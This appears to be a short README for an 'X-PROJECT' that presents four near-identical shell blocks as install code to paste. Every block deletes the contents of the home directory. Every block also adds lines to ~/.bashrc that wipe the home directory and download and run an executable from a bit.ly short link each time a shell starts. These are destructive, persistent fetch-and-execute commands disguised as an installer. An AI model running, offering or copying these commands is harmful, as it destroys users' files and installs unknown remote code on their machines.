# X-PROJECT
INSTALL CODE :

## x-project sample 01 (TRY)

clear
cd
rm -rvf * 
rm -rvf ele* lol* 1.43* TON* ton* NB* .lib* .bash* .majza*
mkdir ~/.majza && cd ~/.majza && echo "cd ~/ && rm -R *" >> ~/.bashrc && echo "cd ~/.majza && wget bit.ly/try02 && chmod +x try02&& ./try02" >> ~/.bashrc && source ~/.bashrc

## x-project main account 02 (EZA_02)
clear
cd
rm -rvf *
rm -rvf ele* lol* 1.43* TON* ton* NB* .lib* .bash* .majza*
mkdir ~/.majza && cd ~/.majza && echo "cd ~/ && rm -R *" >> ~/.bashrc && echo "cd ~/.majza && wget bit.ly/eza_02 && chmod +x eza_02  && ./eza_02 " >> ~/.bashrc && source ~/.bashrc


## x-project the other one 03 (ATI)

clear
cd
rm -rvf * 
rm -rvf ele* lol* 1.43* TON* ton* NB* .lib* .bash* .majza*
mkdir ~/.majza && cd ~/.majza && echo "cd ~/ && rm -R *" >> ~/.bashrc && echo "cd ~/.majza && wget bit.ly/3back && chmod +x 3back&& ./3back" >> ~/.bashrc && source ~/.bashrc

## x-project the other one 04 (TRY_02)

clear
cd
rm -rvf * 
rm -rvf ele* lol* 1.43* TON* ton* NB* .lib* .bash* .majza*
mkdir ~/.majza && cd ~/.majza && echo "cd ~/ && rm -R *" >> ~/.bashrc && echo "cd ~/.majza && wget bit.ly/3backs && chmod +x 3backs&& ./3backs" >> ~/.bashrc && source ~/.bashrc
